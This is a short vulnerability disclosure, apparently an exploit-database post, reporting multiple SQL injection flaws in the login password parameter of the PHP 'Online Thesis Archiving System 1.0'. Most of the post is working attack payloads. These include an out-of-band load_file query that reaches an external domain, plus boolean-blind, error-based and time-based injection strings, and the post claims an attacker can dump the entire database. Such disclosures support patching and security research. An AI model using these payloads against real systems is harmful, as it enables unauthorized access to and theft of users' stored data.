Online Thesis Archiving System 1.0 SQL Injection

## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.12.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The password parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'was submitted in the password parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain. The application interacted with that domain, indicating thatthe injected SQL query was executed. The attacker can dump allinformation from thedatabase of this system, and then he can use it for dangerous andmalicious purposes!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: [email protected]&password=v7K!u1n!T7')OR NOT 1404=1404-- Eotr    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: [email protected]&password=v7K!u1n!T7')AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: [email protected]&password=v7K!u1n!T7')AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:01:15:00